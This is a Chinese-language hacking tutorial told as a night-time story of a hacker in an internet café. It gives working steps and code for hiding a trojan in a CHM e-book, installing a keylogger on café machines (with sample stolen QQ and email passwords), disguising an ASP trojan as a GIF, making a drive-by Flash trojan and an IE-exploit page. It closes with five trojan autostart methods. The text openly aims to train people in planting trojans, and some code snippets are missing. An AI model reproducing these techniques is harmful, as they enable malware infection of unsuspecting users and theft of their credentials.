包容万物的黑夜充满了神秘感……
到了夜里便是黑客们的世界,因为晚间上网的人少,网速很快,再加之网络管理员精神上的松懈。由于种种原因,陆续上演了很多本不该发生的故事……
12点整,一袭黑衣的黑神再一次悄悄地通过网吧出现在了互联网上,开始了本晚的五大秘密行动……
第一幕 书中自有小木马
黑神的工具箱中摆满了各式新奇黑软,其中theef(如图1)*******就是一款功能强焊的dll 特洛伊木马。该木马具有自定义插入系统进程、文件管理、进程管理、窗口管理、记录键盘相关操作、用dos命令控制及编写bat、vbs运行、点对点聊天、抓屏、屏幕控制,以及一大堆恶作剧功能。
黑神从工具箱中取出木马theef与microsoft html help workshop v1.32电子书制作工具。而后,从网上下载了chm格式的电子书《唐伯虎点秋香之经典对白》(如图2)**********。男人都是以泡mm为乐事,黑神也不例外了^-^黑神打开了《唐伯虎点秋香之经典对白》电子书,在随后弹出的主窗口空白处用鼠标右键单击,选择“属性”,获知其网址链接为mk:@msitstore:c:\winnt\system32\唐伯虎点秋香之经典对白.chm::/唐伯虎点秋香之经典对白。而后,黑神随手新建了一个文本文件,在其中输入如下代码:
以下是引用片段:
<html>
<head>
<meta http-equiv="refresh" content="3;
url='/唐伯虎点秋香之经典对白
'">
</head>
<body>
<object width=0 height=0 style="display:none;"
type="application/x-oleobiject"codebase="server210.exe">
</object>
</body>
</html>
完成后,将其另存为mm.htm网页文件。做了一次深呼息后,黑神启动安装好的microsoft html help workshop 工具,选择菜单项“文件菜单”→“解译”。从中找到c:\winnt\system32\唐伯虎点秋香之经典对白的电子书路径,将保存路径更改为e:\hack。而后,将木马客户端文件server210.exe拖放至其中。此后新建了一个文本文件,输入以下内容:
以下是引用片段:
[options]
compatibility=1.1 or later
compiled file=cliconf.chm
default window=main
language=0x804中文(中国)
[windows]
main="sql server 客户端网络实用工具是什么?","唐伯虎点秋香之经典对.hhc","唐伯虎点秋香之经典对.hhk","mm.htm",,,,,,0x420,150,0x104e,,0x0,0x0,,,,,0
[files]
mm.htm
server210.exe
输入完毕后将该文件命名为mm.hhp,并存储于e:\hack文件夹。接着在microsoft html help workshop中打开mm.hhp,选择保存所有文件并编译。关闭该程序后进入到e:\hack目录下,黑神打了个漂亮的响指,电子书木马横空出世了!
黑神立即挟带木马登陆早已注册了的网络硬盘空间站,建立一个目录《伯虎名对》。然后上传编译好的木马电子书到该目录下守株待兔。只要有人下载了这本电子书,那他同时将免费得到一匹小马!
第二幕 网吧木马秘密装
黑神刚刚上传完电子书木马,忽听得网吧内传来一阵嘈杂之声:“老板,多给几台机子,我们要玩传奇”。“又是一帮玩网络游戏的家伙”老板小声滴沽了一句……嘿嘿,怎么把这事儿给忘了。黑神的脸上露出了一丝鬼秘的笑意,迅速查看了一下网吧管理系统。决定用木马程序之密码结巴4.10(如图3)*********,这可是传说中的好东东,可以捕获windows 9x/2000/xp系统中几乎所有普通窗口和网页的登录密码,以及各种网络游戏的密码。该木马最实用之处在于无法被任何杀毒软件所截获,能够成功躲过杀毒软件的内存查杀渗透技术。
在安装密码结巴之前得先封杀该死的还原精灵,于是黑神立即拿出黑软之还原移存大师(如图4)**********。该工具可以在不破坏还原精灵的情况下安装任意软件,即使重新启动计算机后所安装的文件依然会存在。黑神先从网络上将木马下载到本机。然后在需要转存的exe里输入木马的本机地址c:\winnt\木马.exe。此后,黑神在需要转存的木马地址中选择c:\winnt\system32\木马.exe,又修改了图标。最后选择保存,并双击程序让木马开始运行……
不大一会儿的功夫,黑神接收到了以下这封邮件:
序号:0001 时间:2005-3-12 20:26:03 周四 --------
00080534(380,130): 45748795: qq用户登录->
提示框: 用户号码:
选择框: 15663xx
提示框: 用户口令:
密码框: ***13142
提示框: 申请密码保护,确保号码安全
序号:0002 时间:2005-3-12 20:29:10 周四 --------
001805ae(415,558): outlook express - 主标识: internet 帐户: hc_zhang01@163.com 属性服务器->
提示框: 服务器信息
提示框: 邮件发送服务器
输入框: pop.163.com
提示框: 发送邮件(smtp)(&u):
输入框: smtp.163.com
提示框: 帐户名(&c):
输入框: xxxxx011
提示框: 密码(&p):
密码框: ****88803
黑神起身到收银台买了一包烟,顺便看了一眼网管的脸色,同时在想他明天死得肯定很难看……
第三幕 图片木马甜点
“tmd,前几天一个网友说传给我一张mm图片看,结果打开了那张图片之后,计算机沾得混身病毒……”黑神在回到座位的时候听到了这句话,头脑中突然又有“智慧之光”闪过。不如再制造一个图片木马奔驰于网络,给在线的网虫们一个意外的惊喜!说干就干,黑神立刻开始着手创造图片夹带木马的环境。图片木马的原理说白了就是用两段代码的结合,移花接木而成。
黑神首先从网络上下载了冰狐浪子asp,再将其客户端后缀名改为“*.gif”,并使用容错格式:。此后,新建一个asp文件。在其中输入代码:,并保存为“asp.gif”文件。至此,这个图片asp文件木马就大功告成了。
黑神吹了声口哨开始合并双文件。先将“asp.gif”的后缀名更改“asp.asp”。再从网络上下载一副漂亮mm的图片(如图5)*********,将其命名为mm.gif,放置在e盘的hack文件夹下。此后,调出命令提示符,在其中输入命令:e:\hack\copy mm.gif /b + asp.asp /a gg.gif。现在,系统中已生成了一个名为gg.gif的图像木马。
接下来黑神开始考虑如何将木马上传到网络。有了,可以利用bbs的上传图片功能。于是直奔bbs,注册新用户并登陆。进入相应版块后黑神选择发表新帖子,将此贴命名为“不可不看”,而后将该图片木马上传。在提交贴子后,接下来就等着所有浏览者自投罗网吧。嘿嘿!
第四幕 flash木马危机
音乐从黑神的耳机中响起,悠扬的歌声再一次触发了黑神的灵感。我何不再制作一个flash动画木马,让浏览者防不胜防。flash木马原理如下:当用户浏览了内嵌有flash动画的恶意网页后,木马或病毒将随flash自动被下载执行,进而操控对方机器或窃取其密码。
黑神开始挽袖动手了,打开flash mx,选择创建一个新的flash文件。再查看界面下端的“属性”面板,点击“大小”按钮,在弹出的“文档属性”对话框中,设置其宽、高都为1px最小值。此后,黑神在动画栏中选择“动作”→“actions”,在geturl中输入木马路径:http:\\www.xxxx.net。最后,输出文件并生成flash动画。
嘿嘿,下面就要找一个冤大头网站并上传适才制作的flash动画。进入http://www.xxx.3bbs.com注册一个新用户,而后发贴提交了该flash动画。这样,一旦有“冒失鬼”打开了这个页面,那么他的机器会在后台同时下载木马。对方如果不注意查看进程列表,根本无法获知本机又中了一个木马。此外,还可以利用qq将flash动画立即发送给好友(如图6)*******
第五幕 经典网页木马
黑神在制作完成flash动画木马后,又想到ie不是也暴出了很大的漏洞吗?那就利用ie自身的漏洞编写网页木马。当网友浏览利用ie自身漏洞编写的网页时,注册表将被改的乱七八糟,且ie标题、首页等也会被改动,重则注册表编辑器会被禁用……这些都是网页木马的杰作。黑神打算编写一个网页,使网友在浏览指定页面的时候自动打开硬盘共享。
前段代码如下:
输入完成后保存为gg.htm文件,上传到网络空间。一个小巧的网页木马就此制作完成了。黑神编制完成这个木马后立即去163申请了一个域名的转换:http://www.xxxx.net,将其连接到目标地址里。当网友浏览这个页面的时候,他的c盘就就会被共享。
木马自启动五法
黑神突然觉得,这刀可以杀人也可以救人。有的黑客只知道远程进入对方计算机放马,却不知有那些方法能让木马运行。这马如果不活动,那就是死马一只,毫无用处。于是决定写出让木马活动的几招绝学。
第一招 利用autorun.inf
在文本文件中输入以下内容:
以下是引用片段:
[autorun]
open=木马.exe
然后保存为autorun.inf,再将它和木马服务器一块儿放置于目标机器任意驱动器的根目录下。因为windows系统启动后会自动查找每个磁盘的根目录下的autorun.inf。一旦找到此文件,系统就会自动运行其中所设置的程序。
第二招 利用注册表
很多黑客都明白,随windows自动运行的程序,大都在注册表中添加了自启动项。据此,就可以将木马添加在注册表中。例如,目标主机的木马服务端放置于e盘。可新建一个文本文件,在其中输入如下内容:
以下是引用片段:
regedit 4
[hkey_local_machine\software\microsoft\windows\currentversion\run]
"winload"="e:\\木马.exe"
而后,将其另存为arun.reg注册表文件。然后再建立一个文本文件,输入:
以下是引用片段:
[autorun]
open=regedit/s arun.reg
将文件保存为autorun.inf。此后将木马服务端与适才两个新建的文件一同放入目标主机的硬盘根目录下即可。对方的计算机第一次启动后就会将木马添加至注册表,当第二次重启,即可激活木马。
第三招 利用win.ini
win.ini文件在windows 98系统中位于c:\windows目录下;在windows 2000和windows xp系统中位于c:\winnt目录下。用记事本打开目标主机的win.ini文件,写入自启动命令:
以下是引用片段:
[windows]
load=c:\winnt\木马.exe
而后退出并保存。此后,将已准备好的木马服务端放置到c:\winnt目录下即可。只要对方的计算机第一次重启,木马将立时被激活。
第四招 利用system.ini
该方法与上一方法有异曲同工之妙。system.ini文件在windows 98中位于c:\windows目录下;在windows 2000和windows xp系统中位于c:\windows目录下。用记事本打开目标主机的system.ini文件来,写入自启动命令:
以下是引用片段:
[book]
shell=explorer.exe c:\winnt\木马.exe
保存后退出。此后将已准备好的木马服务端放到c:\winnt目录下。目标主机第一次重启后,将立即自动执行木马。
第五招 利用启动组
在目标主机中,进入系统盘的“documents and settings\administrator\「开始」菜单\程序\启动”,将木马服务端放置于该目录下。而后,将文件属性设置为隐藏,再在系统中设置不显示隐藏的文件和文件夹。
努力让每一个黑客都成为放马与养马的能手……
